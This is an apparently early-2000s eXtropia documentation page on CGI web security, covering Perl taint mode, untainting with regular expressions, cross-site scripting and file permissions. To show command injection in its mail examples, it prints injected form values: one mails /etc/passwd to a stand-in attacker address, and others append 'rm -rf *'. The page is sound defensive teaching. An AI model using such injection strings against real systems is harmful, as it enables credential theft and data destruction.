eXtropia: the open web technology company
Technology | Support | Tutorials | Development | About Us | Users | Contact Us
Free support
 ::   Support forums
 ::   Frequently asked questions
 ::   Functional Specifications
 ::   eXtropia Tutorials
 ::   Books by eXtropia
 ::   Other books
 ::   Offsite resources
eXtropia ADT Documentation

Web Security and eXtropia Applications

[ TOC ]
[ TOC ]


    "All data is fraudulent. All communications are attempted hacks. All clients are thieves. Technology is only my first and weakest line of defense" - morning litany for a Web Server Administrator

The minute you connect your computer to the Internet is the minute that the security of your data has been compromised. Even the most secure systems, shepherded by the most intelligent and able system administrators, and employing the most up-to-date, tested software available are at risk every day, all day. As was proven by Kevin Mitnick in the celebrated cracking of the San Diego Supercomputer Center in 1994, even the defenses of seasoned security veterans like Tsutomu Shimamura can be cracked.

The sad fact is that crackers will always have the upper hand. Time, persistence, creativity, the complexity of software and the server environment, and the ignorance of the common user are their weapons. The system administrator must juggle dozens of ever-changing, complex security-related issues at once while crackers need only wait patiently for any slip-up. And of course, system administrators are only human.

Thus, the system administrator's job certainly can not be to build a ``cracker-proof'' environment. Rather, the system administrator can only hope to build a ``cracker-resistant'' environment.

A cracker-resistant environment is one in which everything is done to make the system ``as secure as possible'' while making provisions so that successful cracks cause as little damage as possible and can be discovered as soon as possible.

Thus, for example, at minimum the system administrator should backup all of the data on a system so that if the data is maliciously or accidentally erased or modified, as much of it as possible can be restored.

    NOTE: By the way, don't think that just because your job title is not officially "system administrator" that this does not apply to you. In fact, as soon as you implement a CGI application, you become a system administrator of sorts. For example, the implementer of a WebStore CGI application will have her own users, data files, and security concerns. Thus, it is also your responsibility to make security your number one concern.

Here is a rough check list of minimum level security precautions:

1. Make sure users understand what a good password is and what a bad password is. Good passwords cannot be found in a dictionary and take advantage of letters, numbers and symbols. Good passwords are also changed with some regularity and are not written on scraps of paper in desk drawers.

2. Make sure that file permissions are set correctly. All files should be given the absolute minimum access rights.

3. Make sure to keep abreast of security announcements, bug fixes and patches. For example, put yourself on a CERT (http://www.cert.org/) or a CIAC (http://www.ciac.org/) mailing list and/or return regularly to the sites that distribute the code you use. For eXtropia applications, add yourself to the mailing list in order to get security bulletins.

4. Attempt to crack your site regularly. Learn the tools the crackers are using against you and try your best to use those tools to crack yourself.

5. Make regular backups.

6. Create and check your log files regularly.

[ TOC ]

What is the Worst That Can Happen

Protecting a site is a serious matter and one that everyone should take time to address. Unfortunately, too many web server administrators make the mistake of saying that, "Since I don’t have a high visibility site, and since I don't have a beef with anyone, no one will bother to mess with me."

In fact, you are a target as soon as you have a web presence. Many crackers need no greater excuse than the desire to cause mischief to crack your site.

Once a cracker has access to your system, he or she can do all sorts of mean and nasty things.

Consider some of the following possibilities:

1. Your data/files are erased.

2. Your data/files are sold to your competitor.

3. Your data/files are modified. Check out what happened to the CIA site and others at http://www.2600.com/hacked_pages/.

4. The cracker uses your site to launch attacks against other sites. For example, the cracker attempts to crack the White House server as you.

5. The confidential information provided by your clients is accessed and used against them. ``Well, Mr. Powers, I see from this log file that you have purchased one Swedish penis enlarger!''.

6. Cracker uses your account to launch attacks against other users on the same box. Other innocent users have all this happen because of you.

[ TOC ]

Security and Web Servers

Web services are some of the most dangerous services you can offer.

Essentially, a web server gives the entire net access to the inner workings of your file system. What is worse is the fact that since web server software has only been around since the end of the 1980's, the security community has only had a limited amount of time to scrutinize security holes. Thus, web servers amount to extremely powerful programs which have only been partially bug-tested.

If that were not bad enough, web servers are typically administered by new web server administrators with perhaps more experience in graphic design than server administration. Further many web servers are home to hundreds of users who barely know enough about computers to write HTML and who are often too busy with their own deadlines to take a moment to read things such as this.

This is not to point fingers at anyone. Few people have time or inclination to master security. And that is as it should be. The point is that bad passwords, poorly written programs, world readable files and directories and so forth will always be part of the equation and these are not things that only security gurus can control.

[ TOC ]

Web Security and CGI Applications

Beyond the fact that web servers are insecure to begin with, web servers make a bad situation worse by allowing users to take advantage of CGI applications.

CGI applications are programs that reside on a server and can be run from a web browser. In other words, CGI applications give Joe Cyberspace the ability to execute powerful programs on your server that in all likelihood are first generation, designed by amateurs, and full of security holes.

Yet, since most users have grown to expect CGI access, few system administrators can deny their users the ability to write, install and make public CGI applications of all sorts.

So what is a system administrator to do and how can users of CGI applications help to promote the security of the server as a whole?

As is the case with all security, the administrator and users must attempt to address the following precautions:

CGI applications must be made ``as safe as possible''. The inevitable damages caused by cracked CGI applications must be contained.

[ TOC ]

Reviewing Applications

Needless to say, every application installed on a server should be reviewed by as many qualified people as possible. At very least the system administrator should be given a copy of the code (before and after your modifications), information about where you got the code, and anything else she asks for.

Don't think of your system administrator as a paranoid fascist. She has a very serious job to do. Help her to facilitate a safer environment for everyone even if that means a little more work for you.

Besides that, you should read the code yourself. There is no better time to learn this stuff than now. Although ignorant users will necessarily be part of the security equation it does not give you the go-ahead to be one of those users.

And remember, any bit of code that you do not understand is suspect. As a customer, demand that application authors explain and document their code clearly and completely.

However, you have a further responsibility. You have the responsibility to keep aware of patches, bug fixes, and security announcements. It is likely that such information will be posted on the site from which you got the application. It certainly is posted on eXtropia. As new versions come out, you should do your best to upgrade. And when security announcements are issued, you must make the necessary modifications as soon as possible.

The fact that the information is available to you means that the information is also available to crackers who will probably use it as soon as it is available.

This point is particularly important for all you freelance CGI developers who install applications for clients and then disappear into the sunset. It is essential that you take the responsibility to develop an ongoing relationship with your clients so that when security patches are released you can notify them so that they can hire you or someone else to implement the security changes.

[ TOC ]

Writing Safe CGI Applications

Although this section is primarily focused on installing and customizing pre-built web applications, no discussion of security would be complete without a note on writing safe code. After all, some of the installation/customization work you do might involve writing some code.

Perhaps the best source for information on writing safe CGI applications can be found at Lincoln Stein's WWW Security FAQ (http://www.w3c.org/Security/faq/). Lincoln Stein is a gifted CGI programmer with several public domain talks and FAQS regarding techniques for writing safe CGI.

You should not even consider writing or installing a CGI application until you have read the entire FAQ. However, we will reproduce the most important warning since it should be said several times.

In the FAQ, Stein writes the following,

    "Never, never, never pass unchecked remote user input to a shell command. In C this includes the open(), and system() commands, all of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands."

    Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous. The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.

        $mail_to = &get_name_from_input; # read the address from form
        open (MAIL,"| /usr/lib/sendmail $mail_to");
        print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";
        close MAIL;

    The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent email address. But what if the wily hacker passes an email address that looks like this?

        nobody@nowhere.com; mail badguys@hell.org</etc/passwd;

    Now the open() statement will evaluate the following commands:

        /usr/lib/sendmail nobody@nowhere.com
        mail badguys@hell.org</etc/passwd

    Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password-cracking attack.``>

Other CGI security FAQS include:

1. NCSA Security FAQ: http://hoohoo.ncsa.uiuc.edu/cgi/security.html

2. eXtropia Taint Mode FAQ: /tutorials/taintmode.html

3.CGI Security: Better Safe Than Sorry: http://www.irt.org/articles/js184/index.html

[ TOC ]

Stopping Snoopers

Have you ever investigated a web site by modifying the URL? For example, let's look at one of the pages on eXtropia that can be found at /news.html.

Notice that we are looking at the document news.html file that is in the root directory of the web server ``www.extropia.com''.

Suppose we are interested in knowing what other documents are located in the ``private_stuff'' directory (perhaps documents under development, documents which have been forgotten about, or documents which might have unlisted links for internal use only). To find out, we remove the ``news.html'' reference and test to see if the web administrator has configured the web server to generate a dynamic index and have not included an index file.

In this case we have not.

What you are not looking at is a dynamically created index page containing all files and sub-directories. In fact, many servers on the web are configured so that if the user has not provided an index.html file, the server will output a directory listing much like this. This is not exactly a security bug. Oftentimes, as is the case with our site, the system administrators wanted users to be able to view directory structures.

However, if the server is set to produce a dynamically generated index of a cgi-bin directory, the results can be devastating.

1. Configure the web server to not generate dynamically produced indexes but return an error message instead.

2. Configure your web server to not serve any document other than .cgi documents from within a cgi-bin directory tree.

3. Provide an index.html file with nothing in it so that even if the web server is not configured for CGI security, the cracker will be stopped in their tracks.

4. Move as many of the sensitive files as you can out of the web document tree.

There is another aspect of the snooper that you should definitely be aware of when installing pre-built applications. Snoopers have just as much ability to download the source code and read through it as you do. Thus, they are aware of all of the pre-configured options that are set by default.

In particular, they are aware of filenames and relative directory locations. Thus, if you do not change the default names of files and directories, even if you have stopped them from using the back door and getting directory listings as shown above, they will still know what is available and can access it directly.

In other words, if I know that you are using ``CGI application A'' and that ``CGI application A'' uses a file called ``users.dat'' in a subdirectory called ``Users,'' I might look for it directly using:


In such a way, a cracker could easily gain sensitive information.

As a result, it is crucial that you also rename any file or directory that contains sensitive information. Once you have made it impossible for the hacker to get a dynamically generated index and you have changed all filenames and directory names, it will be much more difficult for the cracker to find her way in.

[ TOC ]

Writable Directories

It is pretty much unavoidable. Any truly complex CGI application is going to have to write to the file system. Examples of writing to the file system include adding to a password file of registered users, creating lock and log files, or creating temporary state maintenance files.

The problem with this is two-fold. First, if the web surfer is given permission to write, she is also, necessarily given permission to delete. Writing and deleting come hand in hand. They are considered equal in terms of server security.

The second problem with writable files is that it is possible that a cracker could use the writable area within your cgi-bin tree to add a CGI application of their own. This is particularly dangerous on multi-user servers such as those used by your typical ISP. A cracker need only get a legitimate account at the same ISP you are on long enough to exploit the security hole. This amounts to 20 minutes worth of payment on their part.

    NOTE: By the way, this cracker tactic of getting an account on your ISP also has serious implications for "snooping". If the cracker can get an account on your server, there is little to stop her from getting at your cgi-bin directory and snooping around. With luck, your ISP runs a CGI wrapper which will obfuscate your cgi-bin area to some degree, but one way or the other, so long as you host your web site on a shared server, your security is seriously compromised. This makes backups even more crucial!

For the most part, the solution to this is to never store writable directories or files within your cgi-bin tree. All writable directories should be stored in less sensitive areas such as outside of your HTML tree or in directories like /tmp that are already provided for insecure file manipulation. A cracker could still erase your data but they could not execute their own rogue CGI application.

However, as we said before, security is about containing damage as well as it is about plugging holes. Thus, it is essential that you protect all files against writing unless you are currently working on them. In other words, if you are not editing an HTML file, it should be set to read-only access. If you are not currently editing the code of a CGI application, it should be stored as read-execute-only.

In short, never grant write permission to any file on your web server unless you are specifically editing that file.

Finally, always backup your files regularly.

[ TOC ]

User Input

All input is an attempted hack. All input is an attempted hack. All input is an attempted hack. Learn those words and repeat them to yourself every day. It is essential for you to consider all information that comes into your CGI application as tainted. The example shown earlier provided by Lincoln Stein is a good example of the kinds of havoc a cracker can create with tainted data. A cracker could easily attempt to use your CGI to execute damaging commands.

An interesting addition to what Stein has to say relates to Server Side Includes (SSI). That is, if your server is set to execute server side includes, it is possible that your CGI application could be used to execute illegitimate code.

Specifically, if the CGI application allows a user to input text that will be echoed back to the web browser window through plain HTML files, the cracker could easily input SSI code. This is a common misconfiguration error for programs like guestbooks. The solution to this problem, of course, is to filter all user data and remove any occurrence of SSI commands. Typically, this is done by changing all occurrences of ``<!'' to ``<-''. Thus, SSI commands will be printed out instead of executed.

A better option is to disable SSI command execution that is even more dangerous than CGI, especially when combined with CGI.

[ TOC ]

Cross Site Scripting Problem

In February 2000, CERT posted advisories related to CSS-- Cross Site Scripting. No, this is not the same as CSS, Cascading Style Sheets, but rather is the unfortunate acronym that CERT assigned to this problem.

In a nutshell, the advisory ultimately related to the fact that you cannot trust user input in CGI scripts, especially if that input will be used to produce further output from the CGI script.

Previously we talked about how user input needs to be watched relative to causing damage to your web site. But what about the other visitors to your site?

Badly coded HTML can be equally annoying, or if they take advantage of browser security problems, dangerous. Consider a piece of javascript code that continually places alert() dialog boxes on a user's browser. That user would probably not want to come back to your site soon afterwards.

However, if you allow other users to post HTML into a message forum, guestbook, or another application where user's share information, then you are opening your web site to this problem of Cross Site Scripting where a user can post malicious code on your application that other user's access.

To avoid this problem, there are a few things you should consider doing in such applications. First, you could use Extropia::DataHandler::HTML. This data handler escapes HTML tags characters so they are rendered useless (eg < with &lt;). Another technique is to enable authentication for user data submissions so that you can keep track of who posted malicious HTML code.

In addition, because there are problems with how browsers interpret different character sets, the < > can sometimes have aliased characters in a different character set. To get around this problem, the character set should be explicitly stated along with the Content-Type header. Note that the latest versions of CGI.pm and the Apache web server tack on an explicitly stated character set by default since the CSS issue was announced by CERT.

To obtain more details on CSS, the following two URLs should help you get started:



[ TOC ]

Taint Mode: Perl's Personal Paranoid Mode

Another thing to understand about the legitimacy of incoming data is that even the data that is supposedly generated administratively can be tainted. It is very easy, for example, to modify hidden form fields or add custom fields to incoming form data to a application. In fact, a cracker could simply download your HTML form, modify it and submit faulty data to your CGI application from their own server. Taint mode is a mode in Perl in which all data that has originated from or comes into contact with user input is considered suspect, or tainted. When running in taint mode, Perl makes sure that tainted data cannot be used to perform operations that might have destructive consequences if the data did not fit the expected input to the program. It turns out that this capability is extremely useful for CGI applications.

Unfortunately only a few references to taint mode documentation exist. Even worse, the number of public domain Perl scripts that exist for CGI programming that enable Taint mode that you could learn from by example is virtually none.

However, if you would like to learn more, there are still a few useful references. OReilly's Programming Perl book has a section on handling insecure data that is also reflected in perldoc’s perlsec guide to Perl Security within the Perl distribution. On the FAQ front, Lincoln Stein's WWW Security FAQ is located at http://www.w3c.org/Security/faq/, and our own taint mode security FAQ is at /tutorials/taintmode.html.

[ TOC ]

What is Taint Mode

Freeware CGI applications are available for download all over the Web. But how many of them are really secure? When you download an application do you check all the logic to make sure it is secure? Do you read through each line of code and anticipate all the ramifications? Most of the time the answer is ``no''. After all, the whole point of downloading software is to get it and run it for free without having to do a lot of work.

Unfortunately, the harsh reality is that if you are really interested in security, there isn't any free lunch out there.

The more complicated a CGI application is, the more likely you will want to find someone else who has already programmed it and avoid doing the work yourself. Also, the more complex a script, the less likely you will care to spend the time scrutinizing it.

The problem is that regardless of how good the author is, every large program has a good probability of having bugs -- with an additional probability that some of them may be security bugs.

However, unlike other languages, Perl offers an ingenious programming model built to check for security issues: taint mode. Basically, taint mode puts a Perl application into ``paranoid'' mode and treats all user supplied input as tainted unless the programmer explicitly ``OKs'' the data.

[ TOC ]

Using Taint Mode In CGI Scripts

To enable taint mode for a script on a site which has Perl 5, change the line at the top of your CGI script from



    #!/usr/local/bin/perl -T

    Note: your path to the Perl executable may vary depending on your server.

Unfortunately, non-UNIX web servers may have trouble activating taint mode for CGI scripts. CGI Scripts running on non-UNIX Servers typically do not recognize the magical #!/usr/local/bin/perl first line of the script. Instead, the web server knows what language to execute the server with because of an operating system or web server configuration variable.

For example, for IIS on NT, you should change the association of Perl scripts to run with taint mode on. Unfortunately, this changes the association for all your Perl scripts. You may not want this behavior if you have legacy scripts that are not built to handle taint mode.

A more reasonable way is to get around the problem by creating a second extension under NT such as tcgi or tgi and associate it with taint mode Perl. Then, rename the applications with the new extension to activate taint mode on them. Thus, even if you have legacy scripts that cannot handle taint mode activation, their migration to taint mode can happen in a planned fashion rather than all at once.

You could also try using another web server that understand the first line of scripts. For example, SAMBAR, a freeware NT web server, can be configured to run the script based on the first line of the cgi script. Apache for Windows also has a similar capability. In this case, you would change the first line to read something like the following:

    #!c:\perl\bin\perl.exe -T

    Note: when you execute a taint mode script from the command-line with the Perl executable, you must pass the -T parameter to the Perl executable or Perl will complain that the '-T' argument was passed too late in the first magic line of the Perl file.

[ TOC ]

What To Do After Taint Mode Is On

You should test your application thoroughly to see if turning on taint mode stops any valid part of your program from executing. Usually the majority of your application will work well. In fact if you are lucky, the whole program may work without any changes at all!

The major caveat to this is that taint mode is not a compile time check. It is a run-time check.

Run-time checking means that taint mode Perl is constantly and vigilantly checking to see if the application is going to do anything unsafe with user input while the program runs. It does not stop checking after the application first loads and compiles (compile-time checking).

Unfortunately, Run-time checking means that you need to test all logical paths of execution your application might take so that ``legal operations'' do not get halted because of taint mode. Taint mode, because it is ultra paranoid, will likely stop actions that you want your program to take. Thus, you must go through the program with a fine tooth comb. If any part of your program fails to execute, then you need to find out what taint mode does not like about the program and rectify it.

Fortunately, the applications and objects in this book have been thoroughly tested with taint mode. However, if you add your own additions or objects, you should always conduct a test of the operations of your program to make sure it is still doing what you want.

Likely, if there is a problem with taint mode, you will encounter an error in the Web Server error log. For example, if we try to run a program with tainted user input passed to a system call, we would get something that looks like the following error:

    Insecure dependency in system while running with -T switch at ...

Likewise, if we have an unclean PATH, a system call may complain about the path being insecure:

    Insecure $ENV{PATH} while running with -T switch at ...

[ TOC ]

How Do We Program For Taint Mode

For a CGI application, the only user input is user submitted form data. It is this user input that the Perl application will consider ``tainted''.

This does not mean that you have to immediately go through a lot of hoops to untaint all the form variables that come in. Not only would that be a big pain to do, but its unnecessary.

Instead, Perl only considers the combination of form variables plus the use of a potentially ``unsafe'' operation to be illegal. Potentially ``unsafe'' operations are operations that could have a permanent destructive effect if the wrong parameters are passed.

Potentially unsafe operations include, but are not necessarily limited to, system calls of any sort such as using system, backticks or piped open function calls, open calls that can write to disk, unlink which deletes files, rename, as well as the evaluation of code based on user input.

In the example given below, we use ``mail'' as an example program, but really the examples here apply to any system call with command line parameters.

For example, if the CGI object's email form variable is ``tainted'', then the following would still be legal:

    print $cgi->param("email") . "\n";

This passes Perl’s taint mode check because the print command is not an unsafe operation. But if you try to pass the same variable to an unsafe version of a system call, Perl will complain.

    system("mail " . $cgi->param("email"));

This operation is illegal under taint mode. Making an unsafe system call plus passing form data as a command line argument is terribly unsafe and is considered unacceptable by Perl running in taint mode. Consider what would happen if someone entered an email address on the form like

    me@mydomain.com; rm -rf *

This would cause the mail program to be executed with the following command-line:

    mail me@mydomain.com; rm -rf *

The mail program would execute, but at what cost? The semi-colon is a shell metacharacter that tells the operating system shell to launch another command. In this case, it is the malicious 'rm -rf *' that is a command to delete all files for the current directory and all subdirectories recursively.

[ TOC ]

Shell Metacharacters

A shell metacharacter is a special character that has meaning to a shell or command-line interpreter that tells it to execute a command or perform some action. Therefore, shell metacharacters are the most dangerous to pass to an executable program because they can cause unexpected and undesirable behavior.

The following is a sample list of shell metacharacters:


Clearly, there are security ramifications. With taint mode turned on though, the Perl interpreter will stop this from occurring at all. However, Perl can't tell what is in the CGI object -- it just assumes HTML form data is tainted whether it is friendly or not. Just to be on the safe side, Perl assumes that all users are malicious.

Thus, if you want to perform that type of command with a user supplied variable, you must always untaint it regardless of whether it contains harmless input or not. Remember, Perl only sees that the string was created as a result of user input (such as a form variable). It has no way of knowing whether the string is safe or not until you untaint it with the techniques we outline here.

It is important to emphasize that this advice is true even for hidden form tags in an HTML page. HIDDEN form tags that are not directly entered by a user are considered tainted by Perl because Perl has no way of telling that the user did not enter that form variable.

After all, it is possible for a user to create their own HTML form and place their own hidden tag values on that form. In other words, all form data passed to the CGI script is considered tainted by Perl.

[ TOC ]

Untainting Using Regular Expressions

The primary way to untaint a variable is to do a regular expression match using groupings enclosed by parentheses inside your expression match pattern. (In Perl, the first matching pattern, enclosed by parentheses in your 'regexp', will be stored in the special variable ``$1''; a match for the second pattern-in-parentheses will be stored in ``$2'', and so on. Thus, given the data and the regexp the value of $1 becomes [val1] and the value stored in $2 will be [val2].) parenthetical groups inside the regular expression pattern match. In Perl, the first parenthetical group match gets assigned to $1, the second parenthetical group to $2, and so on.

Perl considers these new variables that arise from parenthetical groups to be untainted because they arose from a clean operation. Once your regular expression has created these variables, you can use them as your new untainted values.

The following will illustrate this:

Email addresses consist of word characters (a-zA-Z_0-9), dashes, periods and an @ sign. So we want to match this descriptive template. But there is a catch.

If we allow email addresses to have dashes, a lot of programs use dash to signify a command-line parameter. So although we allow dashes in the email address, if you want to be extra careful, make sure that the first character of the email address is only a word character and does not contain dashes or periods. The likelihood that someone really has an email address that begins with a period or dash is relatively low.

Thus, our descriptive template becomes the following:

Match first character as a word character, no extra ones allowed like dashes.

Match 0 or more subsequent characters as word characters that can also include dashes and periods.

Match at least one @ symbol after the preceding two rules.

Match every character (at least one) for the domain name of the email server after the @ symbol. This can consist of word characters, dashes, and periods.

The regular expression for this template is:

      \w{1}        # match 1 word character
        [\w-.]*    # match 0 or more word character, hyphen or period.
          \@       # match any one @ symbol
        [\w-.]+    # match one or more word character, hyphen or period.

    Note: some of these characters are considered shell meta characters. However, because we are disallowing white space as well as forcing the first character to be a word character not containing any meta characters, we are significantly safer.

Further, let us assume that somewhere in the program a variable called $email has been assigned from the CGI object that contains a value submitted by the user from an HTML form using a statement like the following:

    $email = $cgi->param("email");

Now the $email variable is now tainted as well. This is because its value arose directly from another variable that contained tainted (user input) data, namely the CGI object form variable returned from the param method.

So to untaint a variable called $email, you would do the following with a regular expression. Notice the addition of the parentheses to create a parenthetical grouping.

    if ($email =~ /(\w{1}[\w-.]*)\@([\w-.]+)/) {
        $email = "$1\@$2";
    } else {
        warn ("TAINTED DATA SENT BY $ENV{'REMOTE_ADDR'}: $email: $!");
        $email = ""; # successful match did not occur

OK. Let's go over this in a little more detail.

When you use () inside a regular expression, each group of parentheses is mapped to a $# variable where # is the number mapped to however many groups you have. For example, the first set of parentheses that matches in the regular expression is referred to as $1.

In the above example, the first parentheses surround (\w{1}[\w-.]*). This expression matches one or more word characters, dashes, and periods with at least one word character before it which does not contain dashes or periods. Because of the parentheses, this first match gets assigned to $1 by Perl.

Then, an @ symbol is matched.

Finally, the second set of parentheses ([\w-.]+) matches one or more of any word characters, dashes, and periods. This second match gets assigned to $2 by Perl.

If the regular expression is successful, $1 (first parenthetical match) will equal the username portion of the email address and $2 (second parenthetical match) will equal the domain portion.

Thus, the next command, $email = "$1\@$2"; replaces the previously tainted email variable with the safe counterparts: $1 followed by an @ symbol followed by $2.

Notice that $1 and $2 are both considered untainted now. This is very important to see.

Yes, they did arise from the user input data, but Perl considers these variables special. Perl believes that because they resulted from a regular expression you set up, that you have explicitly checked the data for validity in that regular expression. Thus, $1 and $2 are not considered tainted because Perl believes in your ability to set up a good clean regular expression check.

On the other hand, if the user entered an email address that did not match this ``template'', $1 and $2 will equal nothing because the regular expression will have failed. The example above would assign $email = "" in this case because we would have executed the else clause.

Of course, if the user is trying to hack your system, this is a good thing. You only want valid email addresses to come through. You should generally check for the failure of the regular expression as we did above. Then, in the else clause you can do something about the bad data.

As an additional plus, checking for the failure of the regular expression allows you to do something such as print an informational message to STDERR about the variable that did not pass taint checking along with the IP address of the user that tried to pass it. An example of this was illustrated in the else block of code above.

When a CGI script prints to STDERR, that output goes to your Web Server's error log. You should always check your error log for potential hack attempts. Of course, you could always add more sophisticated means of notification such as emailing the bad data directly to you.

Also, if you are really worried about your program's integrity, you could use die() instead of warn() to stop the program rather than quietly warning you.

Additionally, the Extropia::Log classes may be useful in this case. For example, Extropia::Log::Composite can allow multiple types of logging to occur given multiple log objects.

There is another reason to use an if statement to check if the taint regular expression match failed or not. The special variable $1 will remain set to the last successful match if the current regular expression was unsuccessful. Thus, if you are doing several regular expression checks such as these, you may get subtle errors in the program if you do not explicitly check if the match failed or not.

For example, the passed $1 from a previous regex could pass along to another failed regex for a completely different variable. If an email regex passed before a firstname regex, it would look very weird to assign the $1 from the successful email regex to the firstname variable.

Why Not Just Clear Taint Mode With An Open Regular Expression?


Perl usually has a good reason for thinking the input is unsafe. For example, there is a common misconception that HIDDEN INPUT tags on an HTML form that are generated by a CGI script is ``safe''. This is not true because a user could easily mimic your form by making their own HTML form with bogus values. A user blindly untainting HIDDEN INPUT tag values will be in hot water if someone does end up spoofing the values.

Taint mode will catch all this. Avoid the temptation to quickly dismiss a tainted variable by using an ``open'' Regular expression. This cannot be emphasized enough.


    $email =~ /(.*)/;
    $email = $1;

This will match any expression. Thus, effectively no check has actually been done. Yet the $email variable has been untainted.

[ TOC ]

How To Choose An Untaint Regular Expression

Apart from the mantra that you should never blindly choose a completely open regular expression such as .* to untaint a value, you will typically still be faced with some choice as to how to create a regular expression to untaint your variable.

At minimum, you know that we should filter out shell meta characters that might be interpreted badly by an external system call. There are two different ways to come up with a regular expression: rejection of characters and the acceptance of characters.

It is natural to think that we should write an untaint expression to be based off the rejection of characters we deem 'bad'. This will usually 'work' in the practical sense of the word. However, while you are untainting, you should consider honing your regular expression around the specific data that you are attempting to solve.

By approaching the regular expression from the point of view of accepting only characters that are valid for the data being untainted, you strengthen the regular expression so that it doubles as a data validation routine.

This is important because logic errors may crop up in a program where bad data is placed in a value by a user. To avoid logic errors due to hacking, it is best to hone the regular expression around accepting only those characters that make sense for the data you are dealing with while at the same time filtering all the typical shell meta characters.

Recall that Perl considers $1 to be safe now because it trusts that you tested the validity of the variable using the regular expression. Perl cannot and does not judge your regular expression. If you choose to make it too loose like the above regular expression, then Perl will let you.

If you do this, you are short changing the point of taint mode which is to make you sit down and think ``What input do I really want and how do I restrict myself to just that set of characters?''.

[ TOC ]

Fixing Script Problems In Taint Mode

There are two potentially unsafe operations that tend to cause the most problem with taint mode activated. The first is the execution of external programs and the other is loading code to evaluate. To troubleshoot these operations it is important to understand where taint mode evolved from.

Taint mode has been around longer than CGI scripts have been around. So you might ask yourself why was taint mode placed in Perl?

Part of Perl's origins came from systems administration. Unfortunately, SysAdmin scripts usually need to be run as a privileged user such as root. Thus, Perl was endowed with the power of taint mode in order to make writing systems administration scripts more secure.

Unfortunately, this means that taint mode is frequently more paranoid than we would like for CGI scripts. This is because SysAdmin scripts were assumed capable of being executed directly from a UNIX shell. This is less secure because a user has a great deal of control over the environment of the UNIX shell including the ability to change the path that executables are located in.

On the other hand, a web server provides a more secure environment because users who run a CGI script do not have the capability of changing the script's search path information.

One example of this is that the PATH environment variable stops CGI scripts from running an external program. This means that we must clear out the path and use absolute paths inside of system calls and other external program calls in Perl using taint mode.

This restriction makes sense for a SysAdmin script where a user could change the PATH environment variable at will and then run the SysAdmin script with potentially changed behavior.

This level of paranoia makes less sense for CGI programs. However, paranoia is what taint mode is all about and it is relatively easy to fix this issue by configuring your script to use absolute paths.

Likewise, when taint mode is on, the current directory is no longer considered valid for loading library or module files. Again, this is paranoid behavior assuming that we could place our own subversive version of a library in the current directory in order to change the behavior of a SysAdmin script. However, CGI scripts called from a browser do not have to worry about arbitrary code being uploaded to a server. If this is possible on your web server, then you have a lot more problems to worry about.

But like the PATH problem, this library issue is easy to resolve as well. If you wish to add library search paths from the current working directory simply use the 'use lib' pragma. The following code would add back the current working directory plus a Modules directory underneath it to the library search path.

    use lib qw(. ./Modules);

[ TOC ]

Final Taint Mode Tips

Before leaving this section, we'll provide a few take home messages about taint mode.

First, consider logging bad taint/regular expression matches. If you are writing applications which use this module set, please consider utilizing the log feature in order to record the situation in which users enter bad data in your forms.

Second, use the Web Server's error log. The error log is there to catch errors. Even if you are not worried about taint mode problems occurring, you should be checking the error log vigilantly in case other errors are occurring. Remember, taint mode is not a security panacea. Logic errors in your code can result in security issues as well.

Don't Rely Solely on Regular Expressions

This leads us to our third and most major taint mode point. Never trust taint mode to do your work for you. You must always consider all logical flows through your program and consider whether you want them allowed. Always consider security a top priority.

For example, earlier we gave an example of untainting an email address. This is all very well, but it is a very generic untaint operation. What if your application must be more secure than that?

What if you only want to allow certain domains to be emailed or a certain list of email users? If this is the case, then you should always write the most strict code possible. Make sure that only those email addresses can be mailed and no others. Otherwise you may be opening your program up to unexpected behavior.

Unexpected behavior is undesirable. Avoid at all costs.

However, this does not mean that you should make your program inflexible. If you want to limit email addresses, do not hard code the email addresses in your program. Instead, consider placing an array of valid email addresses in the setup file so that your valid email list can be changed later on.

Avoid Needing to Untaint in the first Place

In addition, avoid passing untainted user variables if you can help it. In our mail example, we passed the email address to the mail program on the command-line. However, there are two better ways of doing this.

First, we can avoid passing the email address as a command line parameter entirely by simply using a different mail program. For example, the UNIX sendmail program has an option to allow the Email address to be placed in STDIN.

A second thing we can do is call the mail program by passing the email address as a parameter array instead of a single string to the system() call. When a single string is passed to system() Perl passes the string to the shell for processing the command-line parameters. Unfortunately, as we have seen, this means we must filter out shell metacharacters.

If the command-line parameters are passed to the system() call as an array of parameters, the system() call will not parse them using the shell, and so we can safely pass shell metacharacters in the email address. For example, the following system() command is unsafe if the email address is still tainted.

    system("mail " . $cgi->param("email"));

However, we can mitigate this by passing the parameter as an element of the array of parameters instead of one concatenated string. The following code snippet illustrates this method of calling system().


It turns out that there is a very good reason that we may not wish to pass email addresses that have been untainted by the regular expression we explained earlier. The problem is that if we use the regular expression we discussed previously to untaint variables, we will potentially miss out on some email addresses. The reason for this is that our regular expression was too restrictive.

Valid email addresses on the Internet allow such shell metacharacters as /, &, and %. Consider the & character. Just like the semi-colon discussed previously, & can be used to separate commands. Thus, if we expand the email untaint regular expression to include &, to allow an address like homer&marge@simpsons.com, we are potentially opening up a hole. Consider the following command:

    mail homer&rm -rf *;

This is very similar to the command where we used the semi-colon as a shell metacharacter command delimiter previously. While it is true that this scenario is hard to run across, you should take to heart that it is difficult to anticipate what shell metacharacter combination might be called into action.

Avoid the 'Russian Dolls' Scenario

A final piece of advice in taint mode security is to avoid the ``Russian Dolls'' scenario. You should not just think about your program and the program you are passing a tainted variable to. You should also consider all the subsequent programs that might be called.

Usually this is not a problem. But what if it is? In the last taint mode tip, we mentioned that there was a way to call sendmail by passing the email address through STDIN instead of on the command line. This is way safer because then shell escape characters will not get interpreted in STDIN.

Or will they?

What if, behind the scenes, the sendmail binary actually called another program and passed it command line parameters using the email address? If this was the case, our previously 'secure' solution would be cracked wide open.

Is this far fetched? Maybe yes. It turns out that the standard sendmail binary does not suffer from this ``Russian Doll'' scenario.

However, history does repeat itself. While unlikely, it is not entirely out of the question that an ISP running a third party sendmail system would wish to write a sendmail program that converts calls to sendmail to the new third-party mail system. It is conceivable that mistakes might be made in this bridging code even to the extent of passing previously safe variables as command line parameters to the new system.

While this is an unlikely scenario for sendmail, wrapper programs exist everywhere. This is why scripting, especially Perl scripting, is so popular. One Perl program can act as a glue for many other programs. It is Perl’s strength.

